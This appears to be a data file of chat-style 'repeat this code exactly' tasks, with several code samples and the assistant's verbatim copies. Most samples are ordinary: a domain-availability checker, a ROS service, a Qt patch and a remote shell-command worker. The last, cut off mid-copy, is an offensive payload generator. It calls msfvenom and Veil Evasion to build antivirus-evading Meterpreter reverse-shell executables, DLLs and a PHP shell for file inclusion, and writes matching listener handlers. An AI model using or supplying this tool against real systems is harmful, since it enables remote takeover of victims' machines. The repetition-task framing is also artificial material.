time.sleep(2)\n result = open('unRegged','a')\n timer = 0\n```<|memory_end|>\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
```python
#coding:utf-8
from yuming import ifRegged
import sys
import time,random
dicType = []
dic = {}
dtFile = open('domainType','r').readlines()
for t in dtFile[1:-1]:
dicType.append(t[:-1])
#print dicType
times = [1,2,3,4]
for t in times:
dic[t] = []
totalDic = []
pinyinFile = open('pinyin','r').readlines()
for py in pinyinFile[1:-1]:
py = py[:-2]
dic[1].append(py)
totalDic.append(py)
'''for py2 in pinyinFile:
py2 = py2[:-2]
dic[2].append(py+py2)
totalDic.append(py+py2)'''
''' for py3 in pinyinFile:
py3 = py3[:-1]
dic[3].append(py+py2+py3)
for py4 in pinyinFile:
py4 = py4[:-1]
dic[4].append(py+py2+py3+py4)
'''
result = open('unRegged','a')
'''
print dicType[:10]
sys.exit()
'''
timer=0
for dm in totalDic:
for dtype in dicType[:1]:
domainName = dm + dtype
try:
print domainName
regResult = ifRegged(domainName)
except Exception,e:
print domainName,e
continue
if regResult==1:
print domainName + ' unRegged!'
result.write(domainName + '\t' + 'unRegged!' + '\n')
time.sleep(random.random()*1)
timer = timer + 1
if timer == 20:
result.close()
time.sleep(2)
result = open('unRegged','a')
timer = 0
```
|
[
{
"content": "Here is a code snippet:\n```python\nimport socket\nimport select\nimport codes\nimport funs\nimport os\nimport subprocess\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('server_ip', type=str, help='address of the server (e.g. 198.123.1.3)')\nparser.add_argument('--server_port', type=int, default=12345, required=False, help='port server is listening on')\nargs = parser.parse_args()\n\nmyid = 0\n\noutput_prefix = None\npadding = None\n\ntry:\n connection = socket.create_connection((args.server_ip, args.server_port))\nexcept:\n print('could not connect to server', flush=True)\n raise SystemError\n\nrunning = True\ncmd_timeout = None\n\nlog = funs.get_logger(__name__)\n\nwhile running:\n readable, foo1, foo2 = select.select([connection], [], [], 2)\n\n for qq in funs.getinput():\n if 'exit' in qq:\n running = False\n funs.send(connection, funs.encode(codes.disconnecting))\n\n for s in readable:\n message = funs.recv(s)\n code, data = funs.decode(message)\n\n json_data = data\n\n if code == codes.send_config:\n assert 'client_id' in json_data and 'working_directory' in json_data and 'output_prefix' in json_data\n assert 'padding' in json_data and 'timeout' in json_data\n os.chdir(json_data['working_directory'])\n myid = json_data['client_id']\n output_prefix = json_data['output_prefix']\n padding = json_data['padding']\n cmd_timeout = json_data['timeout']\n\n elif code == codes.send_cmd:\n assert 'command' in json_data and 'cmd_number' in json_data\n command = json_data['command']\n cmdnumber = json_data['cmd_number']\n log.info('Recieved command number : %d' % cmdnumber)\n log.info('--executing : %s' % command)\n\n log.info('will write out to: |%s|' % funs.do_dir(output_prefix, padding, 'stdout', cmdnumber))\n log.info('will write err to: |%s|' % funs.do_dir(output_prefix, padding, 'stderr', cmdnumber))\n\n with open(funs.do_dir(output_prefix, padding, 'stdout', cmdnumber), 'w') as sstdout:\n with open(funs.do_dir(output_prefix, padding, 'stderr', cmdnumber), 'w') as sstderr:\n return_code = subprocess.call(command,\n shell=True,\n stdout=sstdout,\n stderr=sstderr,\n timeout=cmd_timeout)\n if return_code is None:\n log.info('--return_code is None')\n return_code = 1\n # cmd number, client id, return code\n funs.send(connection, funs.encode(codes.finished, (cmdnumber, myid, return_code)))\n if code == codes.exiting:\n log.info('got signal to stop and shut down')\n running = False\n else:\n funs.send(connection, funs.encode(codes.idle))\n\nconnection.close()\n```\nRepeat it exactly.",
"role": "user"
}
] |
[
{
"content": "Here is a code snippet:\n<|memory_start|>```python\nimport socket\nimport select\nimport codes\nimport funs\nimport os\nimport subprocess\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('server_ip', type=str, help='address of the server (e.g. 198.123.1.3)')\nparser.add_argument('--server_port', type=int, default=12345, required=False, help='port server is listening on')\nargs = parser.parse_args()\n\nmyid = 0\n\noutput_prefix = None\npadding = None\n\ntry:\n connection = socket.create_connection((args.server_ip, args.server_port))\nexcept:\n print('could not connect to server', flush=True)\n raise SystemError\n\nrunning = True\ncmd_timeout = None\n\nlog = funs.get_logger(__name__)\n\nwhile running:\n readable, foo1, foo2 = select.select([connection], [], [], 2)\n\n for qq in funs.getinput():\n if 'exit' in qq:\n running = False\n funs.send(connection, funs.encode(codes.disconnecting))\n\n for s in readable:\n message = funs.recv(s)\n code, data = funs.decode(message)\n\n json_data = data\n\n if code == codes.send_config:\n assert 'client_id' in json_data and 'working_directory' in json_data and 'output_prefix' in json_data\n assert 'padding' in json_data and 'timeout' in json_data\n os.chdir(json_data['working_directory'])\n myid = json_data['client_id']\n output_prefix = json_data['output_prefix']\n padding = json_data['padding']\n cmd_timeout = json_data['timeout']\n\n elif code == codes.send_cmd:\n assert 'command' in json_data and 'cmd_number' in json_data\n command = json_data['command']\n cmdnumber = json_data['cmd_number']\n log.info('Recieved command number : %d' % cmdnumber)\n log.info('--executing : %s' % command)\n\n log.info('will write out to: |%s|' % funs.do_dir(output_prefix, padding, 'stdout', cmdnumber))\n log.info('will write err to: |%s|' % funs.do_dir(output_prefix, padding, 'stderr', cmdnumber))\n\n with open(funs.do_dir(output_prefix, padding, 'stdout', cmdnumber), 'w') as sstdout:\n with open(funs.do_dir(output_prefix, padding, 'stderr', cmdnumber), 'w') as sstderr:\n return_code = subprocess.call(command,\n shell=True,\n stdout=sstdout,\n stderr=sstderr,\n timeout=cmd_timeout)\n if return_code is None:\n log.info('--return_code is None')\n return_code = 1\n # cmd number, client id, return code\n funs.send(connection, funs.encode(codes.finished, (cmdnumber, myid, return_code)))\n if code == codes.exiting:\n log.info('got signal to stop and shut down')\n running = False\n else:\n funs.send(connection, funs.encode(codes.idle))\n\nconnection.close()\n```<|memory_end|>\nRepeat it exactly.",
"role": "user"
}
] |
```python
import socket
import select
import codes
import funs
import os
import subprocess
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('server_ip', type=str, help='address of the server (e.g. 198.123.1.3)')
parser.add_argument('--server_port', type=int, default=12345, required=False, help='port server is listening on')
args = parser.parse_args()
myid = 0
output_prefix = None
padding = None
try:
connection = socket.create_connection((args.server_ip, args.server_port))
except:
print('could not connect to server', flush=True)
raise SystemError
running = True
cmd_timeout = None
log = funs.get_logger(__name__)
while running:
readable, foo1, foo2 = select.select([connection], [], [], 2)
for qq in funs.getinput():
if 'exit' in qq:
running = False
funs.send(connection, funs.encode(codes.disconnecting))
for s in readable:
message = funs.recv(s)
code, data = funs.decode(message)
json_data = data
if code == codes.send_config:
assert 'client_id' in json_data and 'working_directory' in json_data and 'output_prefix' in json_data
assert 'padding' in json_data and 'timeout' in json_data
os.chdir(json_data['working_directory'])
myid = json_data['client_id']
output_prefix = json_data['output_prefix']
padding = json_data['padding']
cmd_timeout = json_data['timeout']
elif code == codes.send_cmd:
assert 'command' in json_data and 'cmd_number' in json_data
command = json_data['command']
cmdnumber = json_data['cmd_number']
log.info('Recieved command number : %d' % cmdnumber)
log.info('--executing : %s' % command)
log.info('will write out to: |%s|' % funs.do_dir(output_prefix, padding, 'stdout', cmdnumber))
log.info('will write err to: |%s|' % funs.do_dir(output_prefix, padding, 'stderr', cmdnumber))
with open(funs.do_dir(output_prefix, padding, 'stdout', cmdnumber), 'w') as sstdout:
with open(funs.do_dir(output_prefix, padding, 'stderr', cmdnumber), 'w') as sstderr:
return_code = subprocess.call(command,
shell=True,
stdout=sstdout,
stderr=sstderr,
timeout=cmd_timeout)
if return_code is None:
log.info('--return_code is None')
return_code = 1
# cmd number, client id, return code
funs.send(connection, funs.encode(codes.finished, (cmdnumber, myid, return_code)))
if code == codes.exiting:
log.info('got signal to stop and shut down')
running = False
else:
funs.send(connection, funs.encode(codes.idle))
connection.close()
```
|
[
{
"content": "Return the code unaltered:\n```python\n#!/usr/bin/env python\n#\n# 2014-08-04 Sebastian Rockel ([email protected])\n# Provides a service interface to read the robot motion parameters\n# uses the dynamic_reconfigure client\n#\nimport roslib; roslib.load_manifest('robot_motion_param')\nfrom robot_motion_param.srv import *\nimport rospy\nimport dynamic_reconfigure.client\n\ndef get_params(node, timeout=None):\n client = dynamic_reconfigure.client.Client(node, timeout=timeout)\n return client.get_configuration(timeout=timeout)\n\ndef handle_request(req):\n config = get_params('/move_base_node/DWAPlannerROS', 1.0)\n max_vel = config['max_trans_vel']\n max_acc = config['acc_lim_x']\n max_jerk = 0\n print \"Reading motion parameters (vel, acc, jerk).. {0:4.2f} {1:4.2f} {2:4.2f}\".format(max_vel, max_acc, max_jerk)\n #print config\n return GetMotionParamResponse(max_vel, max_acc, max_jerk)\n\ndef server():\n rospy.init_node('get_robot_motion_param')\n s = rospy.Service('get_motion_param', GetMotionParam, handle_request)\n print \"Ready to read motion parameters..\"\n rospy.spin()\n\nif __name__ == \"__main__\":\n client = dynamic_reconfigure.client.Client('/move_base_node/DWAPlannerROS')\n server()\n```\nExact characters only.",
"role": "user"
}
] |
[
{
"content": "Return the code unaltered:\n<|memory_start|>```python\n#!/usr/bin/env python\n#\n# 2014-08-04 Sebastian Rockel ([email protected])\n# Provides a service interface to read the robot motion parameters\n# uses the dynamic_reconfigure client\n#\nimport roslib; roslib.load_manifest('robot_motion_param')\nfrom robot_motion_param.srv import *\nimport rospy\nimport dynamic_reconfigure.client\n\ndef get_params(node, timeout=None):\n client = dynamic_reconfigure.client.Client(node, timeout=timeout)\n return client.get_configuration(timeout=timeout)\n\ndef handle_request(req):\n config = get_params('/move_base_node/DWAPlannerROS', 1.0)\n max_vel = config['max_trans_vel']\n max_acc = config['acc_lim_x']\n max_jerk = 0\n print \"Reading motion parameters (vel, acc, jerk).. {0:4.2f} {1:4.2f} {2:4.2f}\".format(max_vel, max_acc, max_jerk)\n #print config\n return GetMotionParamResponse(max_vel, max_acc, max_jerk)\n\ndef server():\n rospy.init_node('get_robot_motion_param')\n s = rospy.Service('get_motion_param', GetMotionParam, handle_request)\n print \"Ready to read motion parameters..\"\n rospy.spin()\n\nif __name__ == \"__main__\":\n client = dynamic_reconfigure.client.Client('/move_base_node/DWAPlannerROS')\n server()\n```<|memory_end|>\nExact characters only.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
#
# 2014-08-04 Sebastian Rockel ([email protected])
# Provides a service interface to read the robot motion parameters
# uses the dynamic_reconfigure client
#
import roslib; roslib.load_manifest('robot_motion_param')
from robot_motion_param.srv import *
import rospy
import dynamic_reconfigure.client
def get_params(node, timeout=None):
client = dynamic_reconfigure.client.Client(node, timeout=timeout)
return client.get_configuration(timeout=timeout)
def handle_request(req):
config = get_params('/move_base_node/DWAPlannerROS', 1.0)
max_vel = config['max_trans_vel']
max_acc = config['acc_lim_x']
max_jerk = 0
print "Reading motion parameters (vel, acc, jerk).. {0:4.2f} {1:4.2f} {2:4.2f}".format(max_vel, max_acc, max_jerk)
#print config
return GetMotionParamResponse(max_vel, max_acc, max_jerk)
def server():
rospy.init_node('get_robot_motion_param')
s = rospy.Service('get_motion_param', GetMotionParam, handle_request)
print "Ready to read motion parameters.."
rospy.spin()
if __name__ == "__main__":
client = dynamic_reconfigure.client.Client('/move_base_node/DWAPlannerROS')
server()
```
|
[
{
"content": "Repeat the code exactly:\n```python\nimport pigui.pyqt5.widgets.list.view\nimport pigui.pyqt5.widgets.miller.view\n\nimport about.editor\nimport about.delegate\n\nDefaultList = pigui.pyqt5.widgets.list.view.DefaultList\n\n\ndef create_delegate(self, index):\n typ = self.model.data(index, 'type')\n\n if typ == 'editor':\n suffix = self.model.data(index, 'suffix')\n default = self.model.data(index, 'default')\n value = self.model.data(index, 'value')\n\n Editor = about.editor.get(suffix)\n if Editor:\n return Editor(default=value or default, index=index)\n else:\n return about.editor.noeditor.Editor(suffix=suffix, index=index)\n\n elif typ == 'entry':\n label = self.model.data(index, 'display')\n suffix = self.model.data(index, 'suffix')\n delegate = about.delegate.EntryDelegate(label=label, index=index)\n delegate.setProperty('suffix', suffix)\n return delegate\n\n else:\n return super(DefaultList, self).create_delegate(index)\n\n\ndef monkey_patch():\n DefaultList.create_delegate = create_delegate\n```\nKeep all formatting and sequence.",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly:\n<|memory_start|>```python\nimport pigui.pyqt5.widgets.list.view\nimport pigui.pyqt5.widgets.miller.view\n\nimport about.editor\nimport about.delegate\n\nDefaultList = pigui.pyqt5.widgets.list.view.DefaultList\n\n\ndef create_delegate(self, index):\n typ = self.model.data(index, 'type')\n\n if typ == 'editor':\n suffix = self.model.data(index, 'suffix')\n default = self.model.data(index, 'default')\n value = self.model.data(index, 'value')\n\n Editor = about.editor.get(suffix)\n if Editor:\n return Editor(default=value or default, index=index)\n else:\n return about.editor.noeditor.Editor(suffix=suffix, index=index)\n\n elif typ == 'entry':\n label = self.model.data(index, 'display')\n suffix = self.model.data(index, 'suffix')\n delegate = about.delegate.EntryDelegate(label=label, index=index)\n delegate.setProperty('suffix', suffix)\n return delegate\n\n else:\n return super(DefaultList, self).create_delegate(index)\n\n\ndef monkey_patch():\n DefaultList.create_delegate = create_delegate\n```<|memory_end|>\nKeep all formatting and sequence.",
"role": "user"
}
] |
```python
import pigui.pyqt5.widgets.list.view
import pigui.pyqt5.widgets.miller.view
import about.editor
import about.delegate
DefaultList = pigui.pyqt5.widgets.list.view.DefaultList
def create_delegate(self, index):
typ = self.model.data(index, 'type')
if typ == 'editor':
suffix = self.model.data(index, 'suffix')
default = self.model.data(index, 'default')
value = self.model.data(index, 'value')
Editor = about.editor.get(suffix)
if Editor:
return Editor(default=value or default, index=index)
else:
return about.editor.noeditor.Editor(suffix=suffix, index=index)
elif typ == 'entry':
label = self.model.data(index, 'display')
suffix = self.model.data(index, 'suffix')
delegate = about.delegate.EntryDelegate(label=label, index=index)
delegate.setProperty('suffix', suffix)
return delegate
else:
return super(DefaultList, self).create_delegate(index)
def monkey_patch():
DefaultList.create_delegate = create_delegate
```
|
[
{
"content": "Here is a code file:\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author : Matt Lorentzen\n# Twitter : @lorentzenman\n\nimport os, sys, time, argparse\n\ndef banner():\n\n\tversion = \"part of the spiderweb\"\n \n\tbanner = \"\"\"\n _\n _ __ __ _ _ _ __| | __ _ _ _\n| '_ \\ / _` | | | |/ _` |/ _` | | | |\n| |_) | (_| | |_| | (_| | (_| | |_| |\n| .__/ \\__,_|\\__, |\\__,_|\\__,_|\\__, |\n|_| |___/ |___/\n\n %s\n\"\"\" %version\n \n\tprint(greentxt(banner))\n\n\ndef build_tree():\n\ttree_structure = \"\"\"\nThe following structure is needed for veil output\n\n payloads\n ├── veil\n │ ├── catapult\n │ ├── pillage\n │ └── source\n └── windows\n └── handlers\n\"\"\"\n\tprint(greentxt(tree_structure))\n\n\ndef parse_veil_config():\n\t\"\"\" Loads Veil Configuration file options from /etc/veil/settings.py \"\"\"\n\t# check for veil settings file\n\tif not os.path.isfile('/etc/veil/settings.py'):\n\t\tprint(redtxt(\"[!] Cannot find the veil settings file. Please check Veil installation or install using setup.sh inside './Veil/setup/setup.sh' folder\"))\n\telse:\n\t\tvf = open('/etc/veil/settings.py', 'r')\n\t\tfor line in vf.readlines():\n\t\t\tif not line.startswith('#'):\n\t\t\t\tif \"PAYLOAD\" in line:\n\t\t\t\t\tprint(line.strip())\n\t\tprint(\"\\n\")\n\t\tvf.close()\n\n\n# ----- [ Creating Payloads ] ----- #\n\n\ndef msf_payloads(ip, output_dir, payload_port):\n\t# Payloads Dictionary\n\tpayloads = []\n\tpayloads.append([\"windows/meterpreter/reverse_tcp\",payload_port, \"exe\", \"revmet.exe\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_tcp\", payload_port, \"exe\", \"revmet64.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_http\",payload_port, \"exe\", \"methttp.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_https\",payload_port, \"exe\", \"methttps.exe\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_tcp\",payload_port, \"exe-service\" , \"serv64.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_tcp\",payload_port, \"exe-service\" ,\"serv.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_tcp\",payload_port, \"dll\", \"revmetdll.dll\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_tcp\",payload_port, \"dll\", \"revmetdll64.dll\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_https\", payload_port, \"exe\", \"methttps64.exe\"])\n\n\t#./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe\n\n\tfor parms in payloads:\n\t\tpayload = parms[0]\n\t\tlport = str(parms[1])\n\t\toutput_type = parms[2]\n\t\text = parms[3]\n\t\tbase = output_dir\n\t\tvenom_cmd = \"msfvenom -p \" + payload + \" LHOST=\" + ip + \" LPORT=\" + lport + \" -f \" + output_type + \" -o \" + base + ext\n\t\tprint(\"[!] Generating : \" + bluetxt(payload))\n\t\tprint(\"[>] LHOST \" + greentxt(ip) + \" on port \" + greentxt(lport))\n\t\tos.system(venom_cmd)\n # strip off ext and replace with .rc\n\t\tprint(\"[!] Generating handler for : \" + bluetxt(payload))\n\n\t\thandler = ext.split(\".\")[0] + \".rc\"\n\t\thandler_file = open(base + \"handlers/\" + handler , \"w+\")\n\t\thandler_file.write(\"use exploit/multi/handler\\n\")\n\t\thandler_file.write(\"set payload \" + payload +\"\\n\")\n\t\thandler_file.write(\"set LPORT \" + str(payload_port) + \"\\n\")\n\t\thandler_file.write(\"set LHOST \" + ip + \"\\n\")\n\t\thandler_file.write(\"set ExitOnSession False\\n\")\n\t\thandler_file.write(\"exploit -j -z\\n\")\n\t\thandler_file.close()\n\t\tprint(\"[!] Generated : \" + yellowtxt(handler) + \"\\n\\n\")\n\n\ndef veil_payloads(ip, output_dir, move_payloads, veil_path, payload_port):\n\t\"\"\" Takes local IP address as LHOST parm and builds Veil payloads\"\"\"\n\t# Veil doesn't have a custom output directory option and the default path gets pulled from the config file\n\t# hacky approach :: copy each generated payload and handler in to the custom output directory if it is supplied\n\t# start empty list to hold\n\tos.chdir(veil_path)\n\tpayloads = []\n\t# appends payloads with nested 3 value list for dynamic parm calling\n\tpayloads.append([\"10\",payload_port, \"v_revhttps\"])\n\tpayloads.append([\"5\",payload_port,\"v_revhttp\"])\n\tpayloads.append([\"7\",payload_port,\"v_revmet\"])\n\tpayloads.append([\"6\",payload_port, \"v_revhttp_srv\"])\n\n\tprint(\"Creating Veil Goodness\")\n\tfor parms in payloads:\n\t\tlhost = ip\n\t\tpayload = parms[0]\n\t\tlport = str(parms[1])\n\t\toutput = parms[2]\n\t\tcommand = (\"./Veil.py -t Evasion -p \" + payload + \" -c LHOST=\" + lhost + \" LPORT=\" + lport + \" -o \" + output + \" --ip \" + ip)\n\t\tos.system(command)\n\t\ttime.sleep(2)\n\t\t# if using a custom output directory, veil doesn't have an option to specify the base directory as it gets this from the conf file\n\t\t# payload generated above has unique 'base' name - access the list and check the boolean flag that is pushed in\n\t\t# if this is true, move the file/handler into the custom output directory so that all payloads are in custom location\n\t\tif move_payloads == True:\n\t\t\t# move payload\n\t\t\tos.system(\"mv /root/payloads/windows/\" + output + \".exe \" + output_dir)\n\t\t\tos.system(\"mv /root/payloads/windows/\" + output + \".dll \" + output_dir)\n\t\t\t# move handler\n\t\t\tos.system(\"mv /root/payloads/windows/handlers/\" + output + \"_handler.rc \" + output_dir + \"handlers\")\n\n\ndef php_payloads(ip, output_dir, payload_port):\n\t\"\"\" Creates PHP based raw shell and outputs as txt ready for RFI \"\"\"\n\tpayloads = []\n\tpayloads.append([\"php/meterpreter/reverse_tcp\", payload_port, \"raw\" ,\"pshell.txt\"])\n\t# TODO : push out the payload generation to a dedicated function to remove the code duplication\n\tfor parms in payloads:\n\t\tlhost = ip\n\t\tpayload = parms[0]\n\t\tlport = str(parms[1])\n\t\toutput_type = parms[2]\n\t\text = parms[3]\n\t\tbase = output_dir\n\t\tvenom_cmd = \"msfvenom -p \" + payload + \" LHOST=\" + ip + \" LPORT=\" + lport + \" -f \" + output_type + \" -o \" + base + ext\n\t\tprint(\"[!] Generating : \" + bluetxt(payload))\n\t\tos.system(venom_cmd)\n\t\tprint(\"[!] Generating handler for : \" + bluetxt(payload))\n\t\t# strip off ext and replace with .rc\n\n\t\thandler = ext.split(\".\")[0] + \".rc\"\n\t\thandler_file = open(base + \"handlers/\" + handler , \"w+\")\n\t\thandler_file.write(\"use exploit/multi/handler\\n\")\n\t\thandler_file.write(\"set payload \" + payload +\"\\n\")\n\t\thandler_file.write(\"set LPORT 443\\n\")\n\t\thandler_file.write(\"set LHOST \" + ip + \"\\n\")\n\t\thandler_file.write(\"set ExitOnSession False\\n\")\n\t\thandler_file.write(\"exploit -j -z\\n\")\n\t\thandler_file.close()\n\t\tprint(\"[!] Generated : \" + yellowtxt(handler) + \"\\n\\n\")\n\t\n\t# close this file and then move to backup - crazy stuff to get around read/write/edit locks\n\torig_file = str(base + ext)\n\tbackup_file = orig_file + '.bak'\n\tos.rename(orig_file, backup_file)\n\t# now open this file and remove the comments in php so that the file works\n\tholding = open(backup_file, 'r')\n\tnew_file = open(orig_file, 'w')\n\tlines = holding.readlines()\n\tfor line in lines: \n\t\tif line.startswith('/*<?php /**/'):\n\t\t\tline = line.replace('/*<?php /**/', '<?php')\n\t\t\tnew_file.write(line)\n\t\tnew_file.close()\n\tholding.close()\n\tos.remove(str(backup_file))\n\n\ndef clean(payload_path, veil_path):\n\t\"\"\" Cleans out directory \"\"\"\n\t# start with default Veil direcory - gets rid of hashes etc\n\tos.system(veil_path + \" --clean\")\n\tos.system(\"clear\")\n\tprint(yellowtxt(\"[!] Now cleaning default output directory\\n\"))\n\t# clean out generated payloads in default or custom directory\n\tfor file in os.listdir(payload_path):\n\t\tfile = payload_path + file\n\t\tif os.path.isfile(file):\n\t\t\tprint(\"[!] Removing \" + bluetxt(file))\n\t\t\tos.remove(file)\n\n\ndef get_payload_output(payload_output_dir):\n\t\"\"\" Builds directory structure if output option is supplied \"\"\"\n\toutput_dir = payload_output_dir\n\t# check to see if the trailing slash has been added to the path : ie /root/path\n\tif not output_dir.endswith(\"/\"):\n\t\toutput_dir = output_dir + \"/\"\n\n\t# creates the structure if it doesn't exist\n\tif not os.path.isdir(output_dir):\n\t\tprint(yellowtxt(\"[!] Creating output directory structure\"))\n\t\tos.mkdir(output_dir)\n\t\tos.chdir(output_dir)\n\t\tos.mkdir('handlers')\n\treturn output_dir\n\n\n\n###############################\n### \tHelper Function\t ###\n###############################\n\ndef redtxt(text2colour):\n\tredstart = \"\\033[0;31m\"\n\tredend = \"\\033[0m\"\n\treturn redstart + text2colour + redend\n\ndef greentxt(text2colour):\n\tgreenstart = \"\\033[0;32m\"\n\tgreenend = \"\\033[0m\"\n\treturn greenstart + text2colour + greenend\n\ndef yellowtxt(text2colour):\n\tyellowstart = \"\\033[0;33m\"\n\tyellowend = \"\\033[0m\"\n\treturn yellowstart + text2colour + yellowend\n\ndef bluetxt(text2colour):\n\tbluestart = \"\\033[0;34m\"\n\tblueend = \"\\033[0m\"\n\treturn bluestart + text2colour + blueend\n\n\n\n##############################\n##\t Main Function\t ###\n##############################\n\n\ndef Main():\n\t# program version\n\tversion = 1.0\n\tbanner()\n\tcurdir = os.path.dirname(__file__)\n\tveil_path = os.path.join(curdir, '/Veil/')\n #print veil_path\n\tdefault_path = '/root/payloads/windows'\n\n\tparser = argparse.ArgumentParser(description=\"Payday Payload Generator :: Takes the IP Address and then builds meterpreter windows payloads using msfvenom and veil. Outputs to '/root/payloads/windows/' by default.\")\n\tparser.add_argument(\"--veil\", action=\"store_true\", help='Veil Payloads')\n\tparser.add_argument(\"--msf\", action=\"store_true\", help='MSF Payloads > tcp/exe, tcp/http(s), exe-service, dll')\n\tparser.add_argument(\"--php\", action=\"store_true\", help='Creates PHP payload as txt file for LFI/RFI')\n\tparser.add_argument(\"--clean\", action=\"store_true\", help=\"Cleans out existing files in the output directory\")\n\tparser.add_argument(\"--output\", help=\"Specify new output directory.\")\n\tparser.add_argument(\"--ip\", help='Specify Local IP Address for reverse connections')\n\tparser.add_argument(\"--port\", help='Specify custom port for payloads. Defaults to 443')\t\n\n\t# counts the supplied number of arguments and prints help if they are missing\n\tif len(sys.argv)==1:\n\t\tparser.print_help()\n\t\tsys.exit(1)\n\n\targs = parser.parse_args()\n\n\t# default variable setup\n\tip = args.ip\n\toutput_dir = \"\"\n\tmove_payloads = False\n\tpayload_port = \"\"\n\t\n\t# port option override\n\tif args.port:\n\t\tpayload_port = args.port\n\telse:\n\t\tpayload_port = 443\n\n\t\n\t# set up default path\n\tif args.output:\n\t\toutput = args.output\n\t\toutput_dir = get_payload_output(output)\n\t\tmove_payloads = True\n\n\telse:\n\t\t# default directory output :: Veil config points to the this location\n\t\toutput_dir = \"/root/payloads/windows/\"\n\t\t# add check to see if this direcory exists and if not, create it\n\t\tif not os.path.isdir(output_dir):\n\t\t\tprint(bluetxt(\"[*] The default path : %s is missing\")) %output_dir\n\t\t\tprint(yellowtxt(\"[!] You need to create this default path\"))\n\t\t\tbuild_tree()\n\t\t\tprint(\"The following paths are configured in '/etc/veil/settings.py', these are the default output directories for veil payloads.\")\n\t\t\tparse_veil_config()\n\t\t\tsys.exit(1)\n\t\t\t#os.mkdir(output_dir)\n\t\t\t#os.chdir(output_dir)\n\t\t\t#os.mkdir('handlers')\n\n\tif args.veil:\n\t\tif not ip:\n\t\t\tprint(\"[!] IP address required with this payload option :: --veil --ip <Address>\")\n\t\telse:\n\t\t\tprint(yellowtxt(\"[!] Encoding Veil payloads\"))\n #TODO remove all the original source files in the source directory\n\t\t\tveil_payloads(ip ,output_dir, move_payloads, veil_path, payload_port)\n\n\n\tif args.msf:\n\t\tif not ip:\n\t\t\tprint(\"[!] IP address required with this payload option :: --msf --ip <Address>\")\n\t\telse:\n\t\t\tprint(yellowtxt(\"[!] Encoding MSF Payloads\"))\n\t\t\tmsf_payloads(ip, output_dir, payload_port)\n\n\n\tif args.php:\n\t\tif not ip:\n\t\t\tprint(\"[!] IP address required with this payload option :: --php --ip <Address>\")\n\t\telse:\n\t\t\tprint(yellowtxt(\"[!] Encoding PHP Payloads\"))\n\t\t\tphp_payloads(ip, output_dir, payload_port)\n\n\n\n\tif args.clean:\n\t\tif args.output:\n\t\t\toutput_dir = get_payload_output(output)\n\t\t\tprint(redtxt(\"Cleaning out Payload and Handler File directories in : \") + yellowtxt(output_dir))\n\t\t\tclean(output_dir, veil_script)\n\t\telse:\n\t\t\tpayload_paths = [\"/root/payloads/windows/\",\"/root/payloads/windows/handlers/\"]\n\t\t\tprint(redtxt(\"Cleaning out Payload and Handler File directories\"))\n\t\t\tfor payload_path in payload_paths:\n\t\t\t\tclean(payload_path, veil_path)\n\n\nif __name__ == \"__main__\":\n\tMain()\n```\nReplicate it verbatim.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author : Matt Lorentzen\n# Twitter : @lorentzenman\n\nimport os, sys, time, argparse\n\ndef banner():\n\n\tversion = \"part of the spiderweb\"\n \n\tbanner = \"\"\"\n _\n _ __ __ _ _ _ __| | __ _ _ _\n| '_ \\ / _` | | | |/ _` |/ _` | | | |\n| |_) | (_| | |_| | (_| | (_| | |_| |\n| .__/ \\__,_|\\__, |\\__,_|\\__,_|\\__, |\n|_| |___/ |___/\n\n %s\n\"\"\" %version\n \n\tprint(greentxt(banner))\n\n\ndef build_tree():\n\ttree_structure = \"\"\"\nThe following structure is needed for veil output\n\n payloads\n ├── veil\n │ ├── catapult\n │ ├── pillage\n │ └── source\n └── windows\n └── handlers\n\"\"\"\n\tprint(greentxt(tree_structure))\n\n\ndef parse_veil_config():\n\t\"\"\" Loads Veil Configuration file options from /etc/veil/settings.py \"\"\"\n\t# check for veil settings file\n\tif not os.path.isfile('/etc/veil/settings.py'):\n\t\tprint(redtxt(\"[!] Cannot find the veil settings file. Please check Veil installation or install using setup.sh inside './Veil/setup/setup.sh' folder\"))\n\telse:\n\t\tvf = open('/etc/veil/settings.py', 'r')\n\t\tfor line in vf.readlines():\n\t\t\tif not line.startswith('#'):\n\t\t\t\tif \"PAYLOAD\" in line:\n\t\t\t\t\tprint(line.strip())\n\t\tprint(\"\\n\")\n\t\tvf.close()\n\n\n# ----- [ Creating Payloads ] ----- #\n\n\ndef msf_payloads(ip, output_dir, payload_port):\n\t# Payloads Dictionary\n\tpayloads = []\n\tpayloads.append([\"windows/meterpreter/reverse_tcp\",payload_port, \"exe\", \"revmet.exe\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_tcp\", payload_port, \"exe\", \"revmet64.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_http\",payload_port, \"exe\", \"methttp.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_https\",payload_port, \"exe\", \"methttps.exe\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_tcp\",payload_port, \"exe-service\" , \"serv64.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_tcp\",payload_port, \"exe-service\" ,\"serv.exe\"])\n\tpayloads.append([\"windows/meterpreter/reverse_tcp\",payload_port, \"dll\", \"revmetdll.dll\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_tcp\",payload_port, \"dll\", \"revmetdll64.dll\"])\n\tpayloads.append([\"windows/x64/meterpreter/reverse_https\", payload_port, \"exe\", \"methttps64.exe\"])\n\n\t#./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe\n\n\tfor parms in payloads:\n\t\tpayload = 